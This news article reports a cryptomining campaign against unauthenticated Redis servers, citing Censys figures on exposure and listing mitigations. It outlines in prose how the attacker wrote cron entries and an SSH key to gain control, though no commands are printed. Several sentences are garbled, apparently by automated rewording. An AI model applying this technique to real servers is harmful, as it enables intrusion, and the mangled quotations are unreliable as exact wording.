An unknown attacker targeted tens of thousands of exposed unauthenticated Redis servers on the Internet in an attempt to do so install a cryptocurrency miner.
It is not immediately known whether all of these hosts have been successfully compromised. However, it was made possible by a “lesser-known technique” designed to trick servers into writing data to arbitrary files: a case of unauthorized access which was first documented in September 2018.
“The general idea behind this exploiting technique is to configure Redis to write its file-based database to a directory containing a method to authorize a user (such as adding a key to ‘.ssh/authorized_keys’), or start a process (like adding a script to ‘/etc/cron.d’),” Censys She said in a new article.
The attack surface management platform said it has discovered evidence (i.e. Redis commands) that indicate the attacker’s efforts to archive malicious elements crontab entries in the “/var/spool/cron/root” file, resulting in the execution of a shell script hosted on a remote server.
The shell script, which is still accessible, is designed to do the following:
- End processes related to security and system monitoring
- Delete log files and command histories
- Add a new SSH key (“backup1”) to that of the root user authorized_key file to enable remote access
- disable iptables firewalls
- Install scanning tools like masscan and
- Install and run the XMRig cryptocurrency mining application
The SSH key was said to have been set on 15,526 of the 31,239 unauthenticated Redis servers, suggesting the attack was attempted on “over 49% of known unauthenticated Redis servers on the Internet”.
However, one of the main reasons this attack might fail is because the Redis service needs to run with elevated permissions (for example, root) in order to allow the adversary to write to the said cron directory.
“Although this can happen when running Redis inside a container (like docker), where the process could see itself running as root and allow the attacker to write these files,” said the Censys researchers. “But in this case, only the container is affected, not the physical host.”
The Censys report also revealed that there are approximately 350,675 Internet-accessible Redis database services spanning 260,534 unique hosts.
“While most of these services require authentication, 11% (39,405) do not,” the company said, adding “out of a total of 39,405 unauthenticated Redis servers we observed, the potential data exposure is over 300 gigabytes”.
Top 10 countries with exposed and unauthenticated Redis services include China (20,011), United States (5,108), Germany (1,724), Singapore (1,236), India (876), France (807), Japan (711), Hong Kong ( 512), the Netherlands (433) and Ireland (390).
China also leads in terms of the amount of data exposed per country, amounting to 146 gigabytes of data, with the US coming in second with around 40 gigabytes.
Censys said it also found numerous instances of Redis services that were misconfigured, noting that “Israel is one of the only regions where the number of misconfigured Redis servers exceeds the number of correctly configured ones.”
TO mitigate threatsusers are advised to enable client authentication, configure Redis to run only on inward-facing network interfaces, prevent abuse of the CONFIG command by renaming it to something unguessable, and configure firewalls to only accept Redis connections from trusted hosts.